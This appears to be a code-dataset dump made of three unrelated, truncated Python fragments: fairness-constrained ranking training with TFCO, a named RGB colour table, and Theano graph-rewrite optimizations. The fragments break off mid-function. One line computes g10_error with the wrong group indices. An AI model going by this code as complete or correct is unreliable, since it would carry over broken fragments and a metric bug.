input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
= preds[query_index_]
query_labels = np.array(dataset['labels'])[query_index_]
query_ndcg.append(ndcg(query_labels[np.argsort(-query_pred_)], at=at))
return error_rate_, np.array(group_error_rate_), np.array(
query_error_rate), np.array(query_ndcg)
return error_rate_helper
def create_ranking_model(features, dimension):
"""Construct the ranking model."""
layers = []
layers.append(tf.keras.Input(shape=(dimension,)))
layers.append(
tf.keras.layers.Dense(
128, use_bias=True, bias_initializer='ones', activation='relu'))
layers.append(tf.keras.layers.Dense(1, use_bias=False))
ranking_model = tf.keras.Sequential(layers)
def predictions():
predicted_scores = ranking_model(features()[:, :, 0:dimension])
predicted_scores = tf.squeeze(predicted_scores, axis=-1)
return predicted_scores[:, 0] - predicted_scores[:, 1]
return ranking_model, predictions
def create_multipliers_model(features, dimension, num_constraints):
"""Construct the multiplier model."""
layers = []
layers.append(tf.keras.Input(shape=(dimension,)))
layers.append(
tf.keras.layers.Dense(
64, use_bias=True, bias_initializer='ones', activation='tanh'))
layers.append(tf.keras.layers.Dense(num_constraints, bias_initializer='ones'))
multiplier_model = tf.keras.Sequential(layers)
def multipliers():
batch = features()[:, 0, (-dimension):].reshape(-1, dimension)
batch = np.mean(batch, axis=0).reshape(-1, dimension)
multiplier_scores = multiplier_model(batch)
return multiplier_scores
return multiplier_model, multipliers
def formulate_problem(features,
groups,
labels,
dimension,
constraint_groups,
constraint_slack=None):
"""Formulates a constrained problem."""
# Formulates a constrained problem that optimizes the error rate for a linear
# model on the specified dataset, subject to pairwise fairness constraints
# specified by the constraint_groups and the constraint_slack.
# Args:
# features: Nullary function returning features
# groups: Nullary function returning groups
# labels: Nullary function returning labels
# dimension: Input dimension for ranking model
# constraint_groups: List containing tuples of the form ((pos_group0,
# neg_group0), (pos_group1, neg_group1)), specifying the group memberships
# for the document pairs to compare in the constraints.
# constraint_slack: slackness '\epsilon' allowed in the constraints.
# Returns:
# A RateMinimizationProblem object, and a Keras ranking model.
# Create linear ranking model: we get back a Keras model and a nullary
# function returning predictions on the features.
ranking_model, predictions = create_ranking_model(features, dimension)
# Context for the optimization objective.
context = tfco.rate_context(predictions, labels)
# Constraint set.
constraint_set = []
# Context for the constraints.
for ((pos_group0, neg_group0), (pos_group1, neg_group1)) in constraint_groups:
# Context for group 0.
group0_predictions, group0_labels = group_tensors(
predictions, groups, pos_group0, neg_group=neg_group0)
context_group0 = tfco.rate_context(group0_predictions, group0_labels)
# Context for group 1.
group1_predictions, group1_labels = group_tensors(
predictions, groups, pos_group1, neg_group=neg_group1)
context_group1 = tfco.rate_context(group1_predictions, group1_labels)
# Add constraints to constraint set.
constraint_set.append(
tfco.false_negative_rate(context_group0) <= (
tfco.false_negative_rate(context_group1) + constraint_slack))
constraint_set.append(
tfco.false_negative_rate(context_group1) <= (
tfco.false_negative_rate(context_group0) + constraint_slack))
# Formulate constrained minimization problem.
problem = tfco.RateMinimizationProblem(
tfco.error_rate(context, penalty_loss=tfco.SoftmaxCrossEntropyLoss()),
constraint_set)
return problem, ranking_model
def evaluate_results(model, test_set, params):
"""Returns error rates and violation metrics."""
# Returns overall, group error rates, group-level constraint violations,
# query-level constraint violations for model on test set.
if params['constraint_type'] == 'marginal_equal_opportunity':
g0_error, g0_query_error = group_error_rate(model, test_set, 0)
g1_error, g1_query_error = group_error_rate(model, test_set, 1)
group_violations = [g0_error - g1_error, g1_error - g0_error]
query_violations = [np.max(np.abs(g0_query_error - g1_query_error))]
query_violations_full = [np.abs(g0_query_error - g1_query_error)]
return (error_rate(model, test_set), [g0_error, g1_error], group_violations,
query_violations, query_violations_full)
else:
g00_error, g00_query_error = group_error_rate(model, test_set, 0, 0)
g01_error, g01_query_error = group_error_rate(model, test_set, 0, 1)
g10_error, g10_query_error = group_error_rate(model, test_set, 1, 1)
g11_error, g11_query_error = group_error_rate(model, test_set, 1, 1)
group_violations_offdiag = [g01_error - g10_error, g10_error - g01_error]
group_violations_diag = [g00_error - g11_error, g11_error - g00_error]
query_violations_offdiag = [
np.max(np.abs(g01_query_error - g10_query_error))
]
query_violations_diag = [np.max(np.abs(g00_query_error - g11_query_error))]
query_violations_offdiag_full = np.abs(g01_query_error - g10_query_error)
query_violations_diag_full = np.abs(g00_query_error - g11_query_error)
if params['constraint_type'] == 'cross_group_equal_opportunity':
return (error_rate(model,
test_set), [[g00_error, g01_error],
[g10_error,
g11_error]], group_violations_offdiag,
query_violations_offdiag, [query_violations_offdiag_full])
else:
return (error_rate(model, test_set), [[g00_error, g01_error],
[g10_error, g11_error]],
group_violations_offdiag + group_violations_diag,
query_violations_offdiag + query_violations_diag, [
np.concatenate((query_violations_offdiag_full,
query_violations_diag_full))
])
def display_results(model,
objectives,
group_violations,
query_violations,
query_violations_full,
query_ndcgs,
test_set,
params,
method,
error_type,
show_header=False,
show_plots=False,
best_index=-1,
suffix='',
metric_fn=None,
output_file=None,
plot_ax=None):
"""Prints evaluation results and plots its decision boundary."""
# Evaluate model on test set and print results.
if metric_fn is None:
error, group_error, _, _, viols = evaluate_results(model, test_set, params)
else:
if params['constraint_type'] == 'marginal_equal_opportunity':
valid_groups = [(0, None), (1, None)]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
valid_groups = [(0, 1), (1, 0)]
error, group_error, query_error, _ = metric_fn(model, valid_groups)
viols = [np.abs(query_error[:, 0] - query_error[:, 1])]
result = []
if params['constraint_type'] == 'marginal_equal_opportunity':
if show_header:
output_file.write(
'{:>20}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}\n'.format(
'Method', 'Error', 'Overall', 'Group 0', 'Group 1', 'Mean Query',
'Median Query', '90p Query', 'Max Query'))
output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
'{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
method,
error_type,
error,
group_error[0],
group_error[1],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0]),
))
result = [
error, group_error[0], group_error[1],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0])
]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
if show_header:
output_file.write(
'{:>20}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}{:>15}\n'.format(
'Method', 'Error', 'Overall', 'Group 0/1', 'Group 1/0',
'Mean Query', 'Median Query', '90p Query', 'Max Query'))
if metric_fn is None:
output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
'{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
method,
error_type,
error,
group_error[0][1],
group_error[1][0],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0]),
))
result = [
error, group_error[0][1], group_error[1][0],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0])
]
else:
output_file.write(('{:>20}{:>15}{:>15.3f}{:>15.3f}{:>15.3f}{:>15.3f}' +
'{:>15.3f}{:>15.3f}{:>15.3f}\n').format(
method,
error_type,
error,
group_error[0],
group_error[1],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0]),
))
result = [
error, group_error[0], group_error[1],
np.mean(viols[0]),
np.median(viols[0]),
np.percentile(viols[0], 90),
np.max(viols[0])
]
# Plot decision boundary and progress of training objective/constraint viol.
if show_plots:
if plot_ax is None:
ff, ax = plt.subplots(1, 6, figsize=(16.0, 3.5))
else:
ax = plot_ax
ax[0].set_title('Overall Error')
ax[0].set_xlabel('Number of epochs')
ax[0].plot(range(params['loops']), objectives)
ax[1].set_title('Group Constraint Violation')
ax[1].set_xlabel('Number of epochs')
ax[1].plot(range(params['loops']), np.max(group_violations, axis=1))
ax[2].set_title('Max% Percentile Query \nConstraint Violation per Epoch')
ax[2].set_xlabel('Number of epochs')
ax[2].plot(
range(params['loops']), np.percentile(query_violations, 90, axis=1))
ax[3].set_title('Training Final Query\nConstraint Violation')
ax[3].set_xlabel('Constraint violation')
ax[3].set_ylim(bottom=0, top=20)
ax[3].hist(
np.array(query_violations_full)[best_index, :][0],
range=(0, 1),
bins=20,
density=True)
ax[4].set_title('Testing Query \nConstraint Violation')
ax[4].set_xlabel('Constraint violation')
ax[4].set_ylim(bottom=0, top=20)
ax[4].hist(np.array(viols[0]), range=(0, 1), bins=20, density=True)
ax[5].set_title('Mean Query nDCG')
ax[5].set_xlabel('Number of Epochs')
ax[5].plot(range(params['loops']), query_ndcgs)
if plot_ax is None:
ff.tight_layout()
plt.savefig('{}/{}_plot_{}.png'.format(FLAGS.save_to_dir, FLAGS.prefix,
suffix))
return result
def train_model(train_set, params, metric_fn=None, valid_set=None):
"""Set up problem and model."""
# include id = 0
np.random.seed(121212 + FLAGS.id)
random.seed(212121 + FLAGS.id)
tf.compat.v1.set_random_seed(123456 + FLAGS.id)
if params['multiplier_type'] == 'unconstrained':
# Unconstrained optimization.
constraint_groups = []
if params['constraint_type'] == 'marginal_equal_opportunity':
valid_groups = [(0, None), (1, None)]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
valid_groups = [(0, 1), (1, 0)]
else:
# Constrained optimization.
if params['constraint_type'] == 'marginal_equal_opportunity':
constraint_groups = [((0, None), (1, None))]
valid_groups = [(0, None), (1, None)]
elif params['constraint_type'] == 'cross_group_equal_opportunity':
constraint_groups = [((0, 1), (1, 0))]
valid_groups = [(0, 1), (1, 0)]
elif params['constraint_type'] == 'custom':
constraint_groups = params['constraint_groups']
else:
constraint_groups = []
if 'multiplier_dimension' not in params:
multiplier_dimension = train_set['features'].shape[2] - train_set[
'dimension']
else:
multiplier_dimension = params['multiplier_dimension']
# Dictionary that will hold batch features pairs, group pairs and labels for
# current batch. We include one query per-batch.
paired_batch = {}
batch_index = 0 # Index of current query.
# Data functions.
features = lambda: paired_batch['features']
groups = lambda: paired_batch['groups']
labels = lambda: np.ones(paired_batch['features'].shape[0])
# Create ranking model and constrained optimization problem.
problem, ranking_model = formulate_problem(features, groups, labels,
train_set['dimension'],
constraint_groups,
params['constraint_slack'])
if (params['multiplier_type'] == 'unconstrained') or (
params['multiplier_type'] == 'common'):
# Unconstrained optimization or constrained optimization with a common
# set of Lagrange multipliers for all query.
# Create Lagrangian loss for problem with standard TFCO.
lagrangian_loss, update_ops, multipliers_variables = (
tfco.create_lagrangian_loss(problem, dual_scale=params['dual_scale']))
multipliers_variables_list = [multipliers_variables]
# All paired queries are valid
check_train_pair = lambda _: True
else:
# Constrained optimization with feature-dependent multiplier, or with
# per-query multipliers, i.e. separate set of multipliers per each query.
if params['multiplier_type'] == 'feature_dependent':
# Create multipliers model.
print('Creating multiplier model with {} features.'.format(
multiplier_dimension))
multiplier_model, multipliers = create_multipliers_model(
features, multiplier_dimension, problem.num_constraints)
multipliers_variables_list = multiplier_model.trainable_weights
check_train_pair = lambda x: np.unique(x['groups'], axis=0).shape[0] >= 4
elif params['multiplier_type'] == 'per-query':
# Create separate set of multipliers per query.
multipliers_variables = tf.Variable(
np.ones((train_set['num_queries'], problem.num_constraints)),
dtype=tf.float32)
def multipliers():
return tf.reshape(multipliers_variables[batch_index, :], (-1,))
multipliers_variables_list = [multipliers_variables]
check_train_pair = lambda _: True
else:
raise ValueError('Invalid multiplier type')
# Create Lagrangian loss with multipliers defined above.
def lagrangian_loss():
# Separate out objective, constraints and proxy constraints.
objective = problem.objective()
constraints = problem.constraints()
if constraints.shape[0] == 0:
# If no constraints, just return objective.
return objective
# Set up custom Lagrangian loss.
proxy_constraints = problem.proxy_constraints()
multipliers_tensor = tf.abs(multipliers()) # Abs enforces non-negativity.
primal = objective + tf.tensordot(
tf.stop_gradient(multipliers_tensor), proxy_constraints, 1)
dual = params['dual_scale'] * tf.tensordot(
multipliers_tensor, tf.stop_gradient(constraints), 1)
return primal - dual
update_ops = problem.update_ops
# Create optimizer
if FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(learning_rate=params['learning_rate'])
elif FLAGS.optimizer == 'adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=params['learning_rate'])
else:
optimizer = tf.keras.optimizers.Adagrad(
learning_rate=params['learning_rate'])
# List of trainable variables.
if params['multiplier_type'] == 'unconstrained':
var_list = ranking_model.trainable_weights + problem.trainable_variables
else:
var_list = (
ranking_model.trainable_weights + problem.trainable_variables +
multipliers_variables_list)
# List of objectives, group constraint violations, per-query constraint
# violations, and | |
'grey59': (150, 150, 150),
'grey6': (15, 15, 15),
'grey60': (153, 153, 153),
'grey61': (156, 156, 156),
'grey62': (158, 158, 158),
'grey63': (161, 161, 161),
'grey64': (163, 163, 163),
'grey65': (166, 166, 166),
'grey66': (168, 168, 168),
'grey67': (171, 171, 171),
'grey68': (173, 173, 173),
'grey69': (176, 176, 176),
'grey7': (18, 18, 18),
'grey70': (179, 179, 179),
'grey71': (181, 181, 181),
'grey72': (184, 184, 184),
'grey73': (186, 186, 186),
'grey74': (189, 189, 189),
'grey75': (191, 191, 191),
'grey76': (194, 194, 194),
'grey77': (196, 196, 196),
'grey78': (199, 199, 199),
'grey79': (201, 201, 201),
'grey8': (20, 20, 20),
'grey80': (204, 204, 204),
'grey81': (207, 207, 207),
'grey82': (209, 209, 209),
'grey83': (212, 212, 212),
'grey84': (214, 214, 214),
'grey85': (217, 217, 217),
'grey86': (219, 219, 219),
'grey87': (222, 222, 222),
'grey88': (224, 224, 224),
'grey89': (227, 227, 227),
'grey9': (23, 23, 23),
'grey90': (229, 229, 229),
'grey91': (232, 232, 232),
'grey92': (235, 235, 235),
'grey93': (237, 237, 237),
'grey94': (240, 240, 240),
'grey95': (242, 242, 242),
'grey96': (245, 245, 245),
'grey97': (247, 247, 247),
'grey98': (250, 250, 250),
'grey99': (252, 252, 252),
'honeydew': (240, 255, 240),
'honeydew1': (240, 255, 240),
'honeydew2': (224, 238, 224),
'honeydew3': (193, 205, 193),
'honeydew4': (131, 139, 131),
'hotpink': (255, 105, 180),
'hotpink1': (255, 110, 180),
'hotpink2': (238, 106, 167),
'hotpink3': (205, 96, 144),
'hotpink4': (139, 58, 98),
'indianred': (205, 92, 92),
'indianred1': (255, 106, 106),
'indianred2': (238, 99, 99),
'indianred3': (205, 85, 85),
'indianred4': (139, 58, 58),
'indigo': (75, 0, 130),
'invis': (255, 255, 254),
'ivory': (255, 255, 240),
'ivory1': (255, 255, 240),
'ivory2': (238, 238, 224),
'ivory3': (205, 205, 193),
'ivory4': (139, 139, 131),
'khaki': (240, 230, 140),
'khaki1': (255, 246, 143),
'khaki2': (238, 230, 133),
'khaki3': (205, 198, 115),
'khaki4': (139, 134, 78),
'lavender': (230, 230, 250),
'lavenderblush': (255, 240, 245),
'lavenderblush1': (255, 240, 245),
'lavenderblush2': (238, 224, 229),
'lavenderblush3': (205, 193, 197),
'lavenderblush4': (139, 131, 134),
'lawngreen': (124, 252, 0),
'lemonchiffon': (255, 250, 205),
'lemonchiffon1': (255, 250, 205),
'lemonchiffon2': (238, 233, 191),
'lemonchiffon3': (205, 201, 165),
'lemonchiffon4': (139, 137, 112),
'lightblue': (173, 216, 230),
'lightblue1': (191, 239, 255),
'lightblue2': (178, 223, 238),
'lightblue3': (154, 192, 205),
'lightblue4': (104, 131, 139),
'lightcoral': (240, 128, 128),
'lightcyan': (224, 255, 255),
'lightcyan1': (224, 255, 255),
'lightcyan2': (209, 238, 238),
'lightcyan3': (180, 205, 205),
'lightcyan4': (122, 139, 139),
'lightgoldenrod': (238, 221, 130),
'lightgoldenrod1': (255, 236, 139),
'lightgoldenrod2': (238, 220, 130),
'lightgoldenrod3': (205, 190, 112),
'lightgoldenrod4': (139, 129, 76),
'lightgoldenrodyellow': (250, 250, 210),
'lightgray': (211, 211, 211),
'lightgrey': (211, 211, 211),
'lightpink': (255, 182, 193),
'lightpink1': (255, 174, 185),
'lightpink2': (238, 162, 173),
'lightpink3': (205, 140, 149),
'lightpink4': (139, 95, 101),
'lightsalmon': (255, 160, 122),
'lightsalmon1': (255, 160, 122),
'lightsalmon2': (238, 149, 114),
'lightsalmon3': (205, 129, 98),
'lightsalmon4': (139, 87, 66),
'lightseagreen': (32, 178, 170),
'lightskyblue': (135, 206, 250),
'lightskyblue1': (176, 226, 255),
'lightskyblue2': (164, 211, 238),
'lightskyblue3': (141, 182, 205),
'lightskyblue4': (96, 123, 139),
'lightslateblue': (132, 112, 255),
'lightslategray': (119, 136, 153),
'lightslategrey': (119, 136, 153),
'lightsteelblue': (176, 196, 222),
'lightsteelblue1': (202, 225, 255),
'lightsteelblue2': (188, 210, 238),
'lightsteelblue3': (162, 181, 205),
'lightsteelblue4': (110, 123, 139),
'lightyellow': (255, 255, 224),
'lightyellow1': (255, 255, 224),
'lightyellow2': (238, 238, 209),
'lightyellow3': (205, 205, 180),
'lightyellow4': (139, 139, 122),
'limegreen': (50, 205, 50),
'linen': (250, 240, 230),
'magenta': (255, 0, 255),
'magenta1': (255, 0, 255),
'magenta2': (238, 0, 238),
'magenta3': (205, 0, 205),
'magenta4': (139, 0, 139),
'maroon': (176, 48, 96),
'maroon1': (255, 52, 179),
'maroon2': (238, 48, 167),
'maroon3': (205, 41, 144),
'maroon4': (139, 28, 98),
'mediumaquamarine': (102, 205, 170),
'mediumblue': (0, 0, 205),
'mediumorchid': (186, 85, 211),
'mediumorchid1': (224, 102, 255),
'mediumorchid2': (209, 95, 238),
'mediumorchid3': (180, 82, 205),
'mediumorchid4': (122, 55, 139),
'mediumpurple': (147, 112, 219),
'mediumpurple1': (171, 130, 255),
'mediumpurple2': (159, 121, 238),
'mediumpurple3': (137, 104, 205),
'mediumpurple4': (93, 71, 139),
'mediumseagreen': (60, 179, 113),
'mediumslateblue': (123, 104, 238),
'mediumspringgreen': (0, 250, 154),
'mediumturquoise': (72, 209, 204),
'mediumvioletred': (199, 21, 133),
'midnightblue': (25, 25, 112),
'mintcream': (245, 255, 250),
'mistyrose': (255, 228, 225),
'mistyrose1': (255, 228, 225),
'mistyrose2': (238, 213, 210),
'mistyrose3': (205, 183, 181),
'mistyrose4': (139, 125, 123),
'moccasin': (255, 228, 181),
'navajowhite': (255, 222, 173),
'navajowhite1': (255, 222, 173),
'navajowhite2': (238, 207, 161),
'navajowhite3': (205, 179, 139),
'navajowhite4': (139, 121, 94),
'navy': (0, 0, 128),
'navyblue': (0, 0, 128),
'none': (255, 255, 254),
'oldlace': (253, 245, 230),
'olivedrab': (107, 142, 35),
'olivedrab1': (192, 255, 62),
'olivedrab2': (179, 238, 58),
'olivedrab3': (154, 205, 50),
'olivedrab4': (105, 139, 34),
'orange': (255, 165, 0),
'orange1': (255, 165, 0),
'orange2': (238, 154, 0),
'orange3': (205, 133, 0),
'orange4': (139, 90, 0),
'orangered': (255, 69, 0),
'orangered1': (255, 69, 0),
'orangered2': (238, 64, 0),
'orangered3': (205, 55, 0),
'orangered4': (139, 37, 0),
'orchid': (218, 112, 214),
'orchid1': (255, 131, 250),
'orchid2': (238, 122, 233),
'orchid3': (205, 105, 201),
'orchid4': (139, 71, 137),
'palegoldenrod': (238, 232, 170),
'palegreen': (152, 251, 152),
'palegreen1': (154, 255, 154),
'palegreen2': (144, 238, 144),
'palegreen3': (124, 205, 124),
'palegreen4': (84, 139, 84),
'paleturquoise': (175, 238, 238),
'paleturquoise1': (187, 255, 255),
'paleturquoise2': (174, 238, 238),
'paleturquoise3': (150, 205, 205),
'paleturquoise4': (102, 139, 139),
'palevioletred': (219, 112, 147),
'palevioletred1': (255, 130, 171),
'palevioletred2': (238, 121, 159),
'palevioletred3': (205, 104, 137),
'palevioletred4': (139, 71, 93),
'papayawhip': (255, 239, 213),
'peachpuff': (255, 218, 185),
'peachpuff1': (255, 218, 185),
'peachpuff2': (238, 203, 173),
'peachpuff3': (205, 175, 149),
'peachpuff4': (139, 119, 101),
'peru': (205, 133, 63),
'pink': (255, 192, 203),
'pink1': (255, 181, 197),
'pink2': (238, 169, 184),
'pink3': (205, 145, 158),
'pink4': (139, 99, 108),
'plum': (221, 160, 221),
'plum1': (255, 187, 255),
'plum2': (238, 174, 238),
'plum3': (205, 150, 205),
'plum4': (139, 102, 139),
'powderblue': (176, 224, 230),
'purple': (160, 32, 240),
'purple1': (155, 48, 255),
'purple2': (145, 44, 238),
'purple3': (125, 38, 205),
'purple4': (85, 26, 139),
'red': (255, 0, 0),
'red1': (255, 0, 0),
'red2': (238, 0, 0),
'red3': (205, 0, 0),
'red4': (139, 0, 0),
'rosybrown': (188, 143, 143),
'rosybrown1': (255, 193, 193),
'rosybrown2': (238, 180, 180),
'rosybrown3': (205, 155, 155),
'rosybrown4': (139, 105, 105),
'royalblue': (65, 105, 225),
'royalblue1': (72, 118, 255),
'royalblue2': (67, 110, 238),
'royalblue3': (58, 95, 205),
'royalblue4': (39, 64, 139),
'saddlebrown': (139, 69, 19),
'salmon': (250, 128, 114),
'salmon1': (255, 140, 105),
'salmon2': (238, 130, 98),
'salmon3': (205, 112, 84),
'salmon4': (139, 76, 57),
'sandybrown': (244, 164, 96),
'seagreen': (46, 139, 87),
'seagreen1': (84, 255, 159),
'seagreen2': (78, 238, 148),
'seagreen3': (67, 205, 128),
'seagreen4': (46, 139, 87),
'seashell': (255, 245, 238),
'seashell1': (255, 245, 238),
'seashell2': (238, 229, 222),
'seashell3': (205, 197, 191),
'seashell4': (139, 134, 130),
'sienna': (160, 82, 45),
'sienna1': (255, 130, 71),
'sienna2': (238, 121, 66),
'sienna3': (205, 104, 57),
'sienna4': (139, 71, 38),
'skyblue': (135, 206, 235),
'skyblue1': (135, 206, 255),
'skyblue2': (126, 192, 238),
'skyblue3': (108, 166, 205),
'skyblue4': (74, 112, 139),
'slateblue': (106, 90, 205),
'slateblue1': (131, 111, 255),
'slateblue2': (122, 103, 238),
'slateblue3': (105, 89, 205),
'slateblue4': (71, 60, 139),
'slategray': (112, 128, 144),
'slategray1': (198, 226, 255),
'slategray2': (185, 211, 238),
'slategray3': (159, 182, 205),
'slategray4': (108, 123, 139),
'slategrey': (112, 128, 144),
'snow': (255, 250, 250),
'snow1': (255, 250, 250),
'snow2': (238, 233, 233),
'snow3': (205, 201, 201),
'snow4': (139, 137, 137),
'springgreen': (0, 255, 127),
'springgreen1': (0, 255, 127),
'springgreen2': (0, 238, 118),
'springgreen3': (0, 205, 102),
'springgreen4': (0, 139, 69),
'steelblue': (70, 130, 180),
'steelblue1': (99, 184, 255),
'steelblue2': (92, 172, 238),
'steelblue3': (79, 148, 205),
'steelblue4': (54, 100, 139),
'tan': (210, 180, 140),
'tan1': (255, 165, 79),
'tan2': (238, 154, 73),
'tan3': (205, 133, 63),
'tan4': (139, 90, 43),
'thistle': (216, 191, 216),
'thistle1': (255, 225, 255),
'thistle2': (238, 210, 238),
'thistle3': (205, 181, 205),
'thistle4': (139, 123, 139),
'tomato': (255, 99, 71),
'tomato1': (255, 99, 71),
'tomato2': (238, 92, 66),
'tomato3': (205, 79, 57),
'tomato4': (139, 54, 38),
| |
numpy.all(t.type.broadcastable)]
if len(scalars) == 0:
# Nothing to optimize here
return
non_scalars = [t for t in terms if not numpy.all(t.broadcastable)]
# Perform the op only on the non-scalar inputs, if applicable
if len(non_scalars) == 0:
new_op_input_nb_elements = 1
new_op_output = 1
elif len(non_scalars) == 1:
new_op_input_nb_elements = non_scalars[0].size
new_op_output = node.op(non_scalars[0])
else:
new_op_input = T.mul(*non_scalars)
new_op_input_nb_elements = new_op_input.size
new_op_output = node.op(new_op_input)
# If node.op is a T.elemwise.Prod, then the scalars need to be
# raised to the power of the number of elements in the input
# to the Prod
if (isinstance(node.op, T.elemwise.Prod) and
new_op_input_nb_elements != 1):
scalars = [s ** new_op_input_nb_elements for s in scalars]
# Scale the output of the op by the scalars and return as
# replacement for the original output
mul_inputs = scalars
if new_op_input_nb_elements != 1:
mul_inputs.append(new_op_output)
if len(mul_inputs) == 1:
return mul_inputs
else:
return [T.mul(*mul_inputs)]
if isinstance(node.op, T.Sum) and node_inps.owner and node_inps.owner.op == T.neg:
return [T.neg(node.op(node_inps.owner.inputs[0]))]
@register_specialize
@gof.local_optimizer([T.Elemwise])
def local_elemwise_sub_zeros(node):
"""
Elemwise{sub}(X,X) -> zeros_like(X)
"""
if (isinstance(node.op, T.Elemwise) and
node.op.scalar_op.nin == 2 and
node.op.scalar_op == scalar.sub and
node.inputs[0] == node.inputs[1]):
return [T.zeros_like(node.inputs[0])]
@register_specialize
@register_stabilize
@register_canonicalize
@gof.local_optimizer([T.Elemwise])
def local_useless_elemwise_comparison(node):
"""...
:note: These cases appear in the graph generated by scan.
These optimizations will make the graph easier to read.
# Comparing to itself is constant
Elemwise[{LT,GT}](X, X) -> Elemwise[zeros](X)
Elemwise[{LE,GE}](X, X) -> Elemwise[ones](X)
Elemwise[{minimum,maximum}](X, X) -> X
# Comparing shape to 0 can be constant
Elemwise[LT](X.shape[i], 0) -> Elemwise[zeros](X)
Elemwise[GE](X.shape[i], 0) -> Elemwise[ones](X)
Elemwise[maximum](X.shape[i], 0) -> X.shape[i]
Elemwise[maximum](0, X.shape[i]) -> X.shape[i]
Elemwise[minimum](X.shape[i], 0) -> 0
Elemwise[minimum](0, X.shape[i]) -> 0
# The shape can be replaced with sum of shapes
Elemwise[LT](add([anything that is shapes]), 0) -> Elemwise[zeros](X)
Elemwise[GE](add([anything that is shapes]), 0) -> Elemwise[ones](X)
"""
if not isinstance(node.op, T.Elemwise):
return
if node.op.scalar_op.nin != 2:
return
# Elemwise[{LT,GT}](X, X) -> Elemwise[zeros](X)
if isinstance(node.op.scalar_op, (scalar.LT, scalar.GT)) and \
node.inputs[0] is node.inputs[1]:
return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[{LE,GE}](X, X) -> Elemwise[ones](X)
if isinstance(node.op.scalar_op, (scalar.LE, scalar.GE)) and \
node.inputs[0] is node.inputs[1]:
return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[{minimum,maximum}](X, X) -> X
if isinstance(node.op.scalar_op, (scalar.Minimum, scalar.Maximum)) and \
node.inputs[0] is node.inputs[1]:
return [node.inputs[0]]
# Elemwise[LT](X.shape[i], 0) -> Elemwise[zeros](X)
if isinstance(node.op.scalar_op, scalar.LT) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Shape_i) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[GE](X.shape[i], 0) -> Elemwise[ones](X)
if isinstance(node.op.scalar_op, scalar.GE) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Shape_i) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[maximum](X.shape[i], 0) -> X.shape[i]
if isinstance(node.op.scalar_op, scalar.Maximum) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Shape_i) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [node.inputs[0]]
# Elemwise[maximum](0, X.shape[i]) -> X.shape[i]
if isinstance(node.op.scalar_op, scalar.Maximum) and \
T.extract_constant(node.inputs[0], only_process_constants=True) == 0 and \
node.inputs[1].owner and \
isinstance(node.inputs[1].owner.op, Shape_i):
return [node.inputs[1]]
# Elemwise[minimum](X.shape[i], 0) -> 0
if isinstance(node.op.scalar_op, scalar.Minimum) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Shape_i) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[minimum](0, X.shape[i]) -> 0
if isinstance(node.op.scalar_op, scalar.Minimum) and \
T.extract_constant(node.inputs[0], only_process_constants=True) == 0 and \
node.inputs[1].owner and \
isinstance(node.inputs[1].owner.op, Shape_i):
return [T.zeros_like(node.inputs[1], dtype=node.outputs[0].dtype)]
# Elemwise[LT](add([anything that is shapes]), 0) -> Elemwise[zeros](X)
if isinstance(node.op.scalar_op, scalar.LT) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Elemwise) and \
isinstance(node.inputs[0].owner.op.scalar_op, scalar.Add) and \
all([isinstance(var.owner and var.owner.op, Shape_i)
for var in node.inputs[0].owner.inputs]) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
# Elemwise[GE](add([anything that is shapes]), 0) -> Elemwise[ones](X)
if isinstance(node.op.scalar_op, scalar.GE) and \
node.inputs[0].owner and \
isinstance(node.inputs[0].owner.op, Elemwise) and \
isinstance(node.inputs[0].owner.op.scalar_op, scalar.Add) and \
all([isinstance(var.owner and var.owner.op, Shape_i)
for var in node.inputs[0].owner.inputs]) and \
T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
return
@register_canonicalize
@register_specialize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_sum_prod_div_dimshuffle(node):
"""
sum(a / dimshuffle{...}(b), axis=l) -> sum(a, axis={...}) / b,
if dimension l of the DimShuffle is 'x'
or
prod(a / dimshuffle{...}(b), axis=l) ->
prod(a, axis={...}) / b ** a.shape[l],
if dimension l of the DimShuffle is 'x'
"""
# It does not make much sense now to extend it to the case where the
# dimshuffle is in the numerator, since elemwise inversion of the
# denominator would still be needed before the summation or production.
if isinstance(node.op, (T.Sum, T.elemwise.Prod)):
axis = node.op.axis
if axis is None:
axis = list(range(node.inputs[0].ndim))
